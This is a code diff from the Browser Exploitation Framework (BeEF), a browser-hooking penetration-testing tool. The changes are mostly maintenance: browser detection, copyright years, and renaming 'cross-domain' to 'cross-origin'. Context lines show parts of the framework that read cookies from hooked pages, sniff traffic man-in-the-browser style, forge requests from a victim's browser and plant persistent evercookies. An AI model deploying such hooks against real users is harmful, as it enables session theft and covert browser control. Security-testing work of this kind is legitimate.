+        var legacyCheck = this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
+        return legacyCheck || this.isFFbowser();
     },
 
     /**
@@ -2438,12 +2449,23 @@ beef.browser = {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 99) ? true : false);
     },
 
+    /**
+     * Returns true for modern versions of Chrome (above 9).
+     * @example: beef.browser.isCbowser()
+     */
+    isCbowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Chrome';
+    },    
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC: function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
+        var legacyCheck = this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
+        return legacyCheck || this.isCbowser();
     },
 
     /**
@@ -2486,12 +2508,23 @@ beef.browser = {
         return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
     },
 
+    /**
+     * Returns true if the browser is any version of Opera.
+     * @example: beef.browser.isObowser()
+    */
+    isObowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Opera';
+    },
+
     /**
      * Returns true if Opera.
      * @example: beef.browser.isO()
      */
     isO: function () {
-        return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
+        var legacyCheck = this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
+        return legacyCheck || this.isObowser();
     },
 
     /**
@@ -4265,9 +4298,6 @@ beef.browser = {
 
         try {
             var cookies = document.cookie;
-            /* Never stop the madness dear C.
-             * var veglol = beef.browser.cookie.veganLol();
-             */
             if (cookies) details['browser.window.cookies'] = cookies;
         } catch (e) {
             beef.debug("Cookies can't be read. The hooked origin is most probably using HttpOnly.");

core/main/client/browser/cookie.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -72,7 +72,7 @@ beef.browser.cookie = {
 		},
 
 	    /** @memberof beef.browser.cookie */
-		veganLol: function (){
+		cookieValueRandomizer: function (){
 			var to_hell= '';
 			var min = 17;
 			var max = 25;
@@ -100,7 +100,7 @@ beef.browser.cookie = {
 		},
 		/** @memberof beef.browser.cookie */
 		hasSessionCookies: function (name){
-			this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
+			this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), '', '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
@@ -109,7 +109,7 @@ beef.browser.cookie = {
 		},
 		/** @memberof beef.browser.cookie */
 		hasPersistentCookies: function (name){
-			this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
+			this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), 1, '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');

core/main/client/browser/popup.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/dom.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/encode/base64.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/encode/json.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/geolocation.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/hardware.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/init.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/lib/evercookie.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -31,7 +31,7 @@
  *  for example, if someone deletes all but one type of cookie, once
  *  that cookie is re-discovered, all of the other cookie types get reset
  *
- *  !!! SOME OF THESE ARE CROSS-DOMAIN COOKIES, THIS MEANS
+ *  !!! SOME OF THESE ARE CROSS-ORIGIN COOKIES, THIS MEANS
  *  OTHER SITES WILL BE ABLE TO READ SOME OF THESE COOKIES !!!
  *
  * USAGE:
@@ -803,7 +803,7 @@ this.evercookie_cookie = function(name, value)
         else
             return this.getFromStr(name, document.cookie);
     }catch(e){
-        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // the hooked origin is using HttpOnly, so we must set the hook ID in a different way.
         // evercookie_userdata and evercookie_window will be used in this case.
     }
 };

core/main/client/logger.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/mitb.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -38,7 +38,7 @@ beef.mitb = {
                         if (method == "GET") {
                             //GET request -> cross-origin
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
-                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+                                beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + url);
                                 window.open(url);
                             }else { //GET request -> same-origin
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);

core/main/client/net.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -74,7 +74,7 @@ beef.net = {
         this.status_text = null;        // success, timeout, error, ...
         this.response_body = null;      // "<html>…." if not a cross-origin request
         this.port_status = null;        // tcp port is open, closed or not http
-        this.was_cross_domain = null;   // true or false
+        this.was_cross_origin = null;   // true or false
         this.was_timedout = null;       // the user specified timeout was reached
         this.duration = null;           // how long it took for the request to complete
         this.headers = null;            // full response headers
@@ -217,11 +217,11 @@ beef.net = {
      * @return {Object} this object contains the response details
      */
     request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
-        //check if same domain or cross domain
-        var cross_domain = true;
+        //check if same origin or cross origin
+        var cross_origin = true;
         if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
             if (document.location.port == "" || document.location.port == null) {
-                cross_domain = !(port == "80" || port == "443");
+                cross_origin = !(port == "80" || port == "443");
             }
         }
 
@@ -238,12 +238,12 @@ beef.net = {
 
         //define response object
         var response = new this.response;
-        response.was_cross_domain = cross_domain;
+        response.was_cross_origin = cross_origin;
         var start_time = new Date().getTime();
 
         /*
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
-         * This will turn POSTs into GETs for remote-domain requests.
+         * This will turn POSTs into GETs for cross origin requests.
          */
         if (method == "POST") {
             $j.ajaxSetup({
@@ -310,7 +310,7 @@ beef.net = {
     /**
      * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
-     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *  - allowCrossOrigin: set cross-origin requests as allowed or blocked
      *
      * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      * Example usage:
@@ -318,20 +318,20 @@ beef.net = {
      *   true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
      *   alert(response.response_body)})
      */
-    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossOrigin, requestid, callback) {
 
         if (domain == "undefined" || path == "undefined") {
             beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
             return;
         }
 
-        // check if same domain or cross domain
-        var cross_domain = true;
+        // check if same origin or cross origin
+        var cross_origin = true;
         if (document.domain == domain && document.location.protocol == scheme + ':') {
             if (document.location.port == "" || document.location.port == null) {
-                cross_domain = !(port == "80" || port == "443");
+                cross_origin = !(port == "80" || port == "443");
             } else {
-                if (document.location.port == port) cross_domain = false;
+                if (document.location.port == port) cross_origin = false;
             }
         }
 
@@ -348,23 +348,23 @@ beef.net = {
 
         // define response object
         var response = new this.response;
-        response.was_cross_domain = cross_domain;
+        response.was_cross_origin = cross_origin;
         var start_time = new Date().getTime();
 
-        // if cross-domain requests are not allowed and the request is cross-domain
+        // if cross-origin requests are not allowed and the request is cross-origin
         // don't proceed and return
-        if (allowCrossDomain == "false" && cross_domain) {
+        if (allowCrossOrigin == "false" && cross_origin) {
             beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
             response.status_code = -1;
-            response.status_text = "crossdomain";
-            response.port_status = "crossdomain";
+            response.status_text = "crossorigin";
+            response.port_status = "crossorigin";
             response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
             response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
             if (callback != null) callback(response, requestid);
             return response;
         }
 
-        // if the request was cross-domain from a HTTPS origin to HTTP
+        // if the request was cross-origin from a HTTPS origin to HTTP
         // don't proceed and return
         if (document.location.protocol == 'https:' && scheme == 'http') {
             beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
@@ -379,7 +379,7 @@ beef.net = {
 
         /*
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
-         * This will turn POSTs into GETs for remote-domain requests.
+         * This will turn POSTs into GETs for cross origin requests.
          */
         if (method == "POST") {
             $j.ajaxSetup({
@@ -432,10 +432,10 @@ beef.net = {
             },
 
             complete: function (xhr, textStatus) {
-                // cross-domain request
-                if (cross_domain) {
+                // cross-origin request
+                if (cross_origin) {
 
-                    response.port_status = "crossdomain";
+                    response.port_status = "crossorigin";
 
                     if (xhr.status != 0) {
                         response.status_code = xhr.status;
@@ -446,7 +446,7 @@ beef.net = {
                     if (textStatus) {
                         response.status_text = textStatus;
                     } else {
-                        response.status_text = "crossdomain";
+                        response.status_text = "crossorigin";
                     }
 
                     if (xhr.getAllResponseHeaders()) {
@@ -460,7 +460,7 @@ beef.net = {
                     }
 
                 } else {
-                    // same-domain request
+                    // same-origin request
                     response.status_code = xhr.status;
                     response.status_text = textStatus;
                     response.headers = xhr.getAllResponseHeaders();

core/main/client/net/connection.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/dns.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/local.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/portscanner.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/requester.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -25,7 +25,7 @@ beef.net.requester = {
             request = requests_array[i];
             if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
             beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
-            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
+            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossOrigin, request.id,
                                        function(res, requestid) { beef.net.send('/requester', requestid, {
                                            response_data: res.response_body,
                                            response_status_code: res.status_code,

core/main/client/net/xssrays.js

@@ -171,7 +171,7 @@ beef.net.xssrays = {
                 this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
                     search:url.search, type: 'url'});//scan each link & param
             } else {
-                beef.debug('Scan is not Cross-domain.  URLS\nurl :' + url.hostname.toString());
+                beef.debug('Scan is not Cross-origin.  URLS\nurl :' + url.hostname.toString());
                 beef.debug('\nlocation :' + location.hostname.toString());
             }
         }
@@ -251,7 +251,7 @@ beef.net.xssrays = {
                             continue;
                         }
                         if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
-                            beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
+                            beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
                             beef.debug('location :' + this.host(location));
                             continue;
                         }

core/main/client/os.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/session.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/timeout.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/updater.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/webrtc.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/websocket.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/command.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/configuration.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -26,7 +26,6 @@ module BeEF
         begin
           # open base config
           @config = load(config)
-          # set default value if key? does not exist
           @config.default = nil
           @@config = config
         rescue StandardError => e
@@ -72,10 +71,12 @@ module BeEF
 
         return unless validate_public_config_variable?(@config)
 
+        # Note for developers:
+        # The configuration path 'beef.http.public_port' is deprecated.
+        # Use the new format for public_port variables as described in the BeEF project documentation.
+        # Refer to the BeEF configuration guide for the web server configuration details:
+        # https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration
         if @config['beef']['http']['public_port']
-          print_error 'Config path beef.http.public_port is deprecated.'
-          print_error 'Please use the new format for public variables found'
-          print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
           return
         end
 
@@ -154,7 +155,7 @@ module BeEF
         "#{beef_proto}://#{beef_host}:#{beef_port}"
       end
 
-      # Returns the hool path value stored in the config file
+      # Returns the hook path value stored in the config file
       #
       # @return [String] hook file path
       def hook_file_path
@@ -255,7 +256,7 @@ module BeEF
       #
       def load_modules_config
         set('beef.module', {})
-        # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
+        # support nested sub-categories, like browser/hooked_origin/ajax_fingerprint
         module_configs = File.join("#{$root_dir}/modules/**", 'config.yaml')
         Dir.glob(module_configs) do |cf|
           y = load(cf)
@@ -277,13 +278,15 @@ module BeEF
 
       private
 
+      # Note for developers:
+      # The configuration path 'beef.http.public' is deprecated.
+      # Use the new format for public variables as described in the BeEF project documentation.
+      # Refer to the BeEF configuration guide for the web server configuration details:
+      # https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration
       def validate_public_config_variable?(config)
         return true if config['beef']['http']['public'].is_a?(Hash) ||
                        config['beef']['http']['public'].is_a?(NilClass)
 
-        print_error 'Config path beef.http.public is deprecated.'
-        print_error 'Please use the new format for public variables found'
-        print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
         false
       end
     end

core/main/console/banners.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -32,7 +32,7 @@ module BeEF
             print_info "Browser Exploitation Framework (BeEF) #{version}"
             data = "Twit: @beefproject\n"
             data += "Site: https://beefproject.com\n"
-            data += "Blog: http://blog.beefproject.com\n"
+            # data += "Blog: http://blog.beefproject.com\n"
             data += "Wiki: https://github.com/beefproject/beef/wiki\n"
             print_more data
             print_info 'Project Creator: ' + 'Wade Alcorn'.red + ' (@WadeAlcorn)'
@@ -134,6 +134,29 @@ module BeEF
